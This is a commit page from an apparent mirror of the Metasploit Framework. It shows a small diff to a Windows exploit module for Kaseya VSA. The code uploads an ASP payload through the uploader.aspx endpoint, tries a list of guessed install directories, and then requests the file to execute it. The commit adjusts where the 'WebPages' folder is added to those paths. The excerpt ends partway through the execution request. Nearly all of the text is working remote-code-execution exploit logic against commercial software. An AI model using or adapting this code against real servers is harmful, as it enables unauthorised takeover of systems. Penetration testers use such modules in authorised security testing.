infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add WebPges to the paths

bug/bundler_fix
jvazquez-r7 2015-10-01 13:22:56 -05:00
parent f9a9a45cf8
commit a88a6c5580
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 12 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
modules/exploits/windows/http/kaseya_uploader.rb
View File

@ -60,13 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_file(payload, path, filename, session_id)
print_status("#{peer} - Uploading payload to #{path + 'WebPages\\'}...")
print_status("#{peer} - Uploading payload to #{path}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
'vars_get' => {
'PathData' => path + 'WebPages' + '\\',
'PathData' => path,
'qqfile' => filename
},
'data' => payload,
@ -100,20 +100,20 @@ class Metasploit3 < Msf::Exploit::Remote
paths = [
# We have to guess the path, so just try the most common directories
'C:\\Kaseya\\',
'C:\\Program Files\\Kaseya\\',
'C:\\Program Files (x86)\\Kaseya\\',
'D:\\Kaseya\\',
'D:\\Program Files\\Kaseya\\',
'D:\\Program Files (x86)\\Kaseya\\',
'E:\\Kaseya\\',
'E:\\Program Files\\Kaseya\\',
'E:\\Program Files (x86)\\Kaseya\\',
'C:\\Kaseya\\WebPages\\',
'C:\\Program Files\\Kaseya\\WebPages\\',
'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
'D:\\Kaseya\\WebPages\\',
'D:\\Program Files\\Kaseya\\WebPages\\',
'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
'E:\\Kaseya\\WebPages\\',
'E:\\Program Files\\Kaseya\\WebPages\\',
'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
]
paths.each do |path|
if upload_file(payload, path, asp_name, session_id)
register_files_for_cleanup(path + "WebPages\\" + asp_name)
register_files_for_cleanup(path + asp_name)
print_status("#{peer} - Executing payload #{asp_name}")
send_request_cgi({